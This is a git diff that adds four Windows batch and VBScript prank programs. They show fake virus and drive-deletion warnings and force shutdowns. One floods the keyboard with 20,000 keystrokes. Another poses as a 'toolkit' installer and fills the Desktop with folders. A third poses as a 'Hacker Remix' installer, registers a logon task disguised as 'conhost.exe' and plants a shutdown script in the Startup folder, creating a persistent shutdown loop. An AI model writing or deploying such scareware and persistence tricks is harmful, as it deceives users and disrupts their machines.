diff options
Diffstat (limited to 'ShitStain')
-rw-r--r-- | ShitStain/Prequel/ShitStain_The_Prequel.bat | 24 | ||||
-rw-r--r-- | ShitStain/Sequel/ShitStain_The_Sequel.bat | 14 | ||||
-rw-r--r-- | ShitStain/ShitStain/ShitStain.vbs | 9 | ||||
-rw-r--r-- | ShitStain/Thurd/ShitStain_The_Thurd.bat | 31 |
4 files changed, 78 insertions, 0 deletions
diff --git a/ShitStain/Prequel/ShitStain_The_Prequel.bat b/ShitStain/Prequel/ShitStain_The_Prequel.bat new file mode 100644 index 0000000..1b3f938 --- /dev/null +++ b/ShitStain/Prequel/ShitStain_The_Prequel.bat @@ -0,0 +1,24 @@ +::Says it has detected a virus and deletes C:\ but only shutsdown
+@echo off
+@echo WARNING VIRUS ATTACK!
+@echo WARNING VIRUS ATTACK!
+@echo WARNING VIRUS ATTACK!
+@echo All Files Deleted. Reboot to Restore.
+@echo Press Enter to Reboot
+timeout 5 /nobreak >NUL
+@echo C: Drive Deleted
+@echo WARNING! All Files Lost! Virus Detected
+@echo Contact Administrator
+@echo WARNING! FIREWALL BREACHED!
+shutdown /t 10 /s
+@echo WARNING! System Shutdown in 5!
+timeout 2 /nobreak >NUL
+@echo WARNING! System Shutdown in 4!
+timeout 2 /nobreak >NUL
+@echo WARNING! System Shutdown in 3!
+timeout 2 /nobreak >NUL
+@echo WARNING! System Shutdown in 2!
+timeout 2 /nobreak >NUL
+@echo WARNING! System Shutdown in 1!
+timeout 2 /nobreak >NUL
+pause > nul
\ No newline at end of file diff --git a/ShitStain/Sequel/ShitStain_The_Sequel.bat b/ShitStain/Sequel/ShitStain_The_Sequel.bat new file mode 100644 index 0000000..c852830 --- /dev/null +++ b/ShitStain/Sequel/ShitStain_The_Sequel.bat @@ -0,0 +1,14 @@ +::fake toolkit instalation progrm that makes a ton of files in Desktop and shutsdown after that
+@echo off
+title Toolkit installation
+msg * Toolkit installation is starting
+cd /d %systemdrive%\Users\%username%\
+tree
+cd /d %systemdrive%\Users\%username%\Desktop
+setlocal EnableDelayedExpansion
+ for /l %%x in (1,1,40) do (
+ mkdir !random!
+ )
+endlocal
+msg * The toolkit installation is nearly complete please wait ...
+shutdown /s /t 10
\ No newline at end of file diff --git a/ShitStain/ShitStain/ShitStain.vbs b/ShitStain/ShitStain/ShitStain.vbs new file mode 100644 index 0000000..a35ac0e --- /dev/null +++ b/ShitStain/ShitStain/ShitStain.vbs @@ -0,0 +1,9 @@ +set shell = createobject("wscript.shell")
+a = 0
+msgbox "After you click ok the message will start in 5 seconds "
+wscript.sleep(5000)
+for i=1 to 20000
+a = a + 1
+Shell.SendKeys(a & "{Enter}")
+wscript.sleep(100)
+next
\ No newline at end of file diff --git a/ShitStain/Thurd/ShitStain_The_Thurd.bat b/ShitStain/Thurd/ShitStain_The_Thurd.bat new file mode 100644 index 0000000..ab8d1ab --- /dev/null +++ b/ShitStain/Thurd/ShitStain_The_Thurd.bat @@ -0,0 +1,31 @@ +::Fake Hacker toolkit that makes a shutdown.bat on startup menu
+@echo off
+title Hacker Remix
+goto choice
+
+:start
+schtasks /create /tn "conhost.exe" /tr %CD%\%0 /sc onlogon
+cd /d "%systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
+echo @echo off > lol.bat
+echo shutdown /p >>lol.bat
+shutdown /p
+break
+
+:choice
+color 0f
+echo Do you want to begin the Hacker Remix installation?[Y/N]
+set input=
+set /p input=
+if %input%==Y goto start
+if %input%==y goto start
+if %input%==yes goto start
+if %input%==YES goto start
+if %input%==Yes goto start
+if %input%==N goto end
+if %input%==n goto end
+if %input%==no goto end
+if %input%==NO goto end
+if %input%==No goto end
+
+:end
+break
\ No newline at end of file |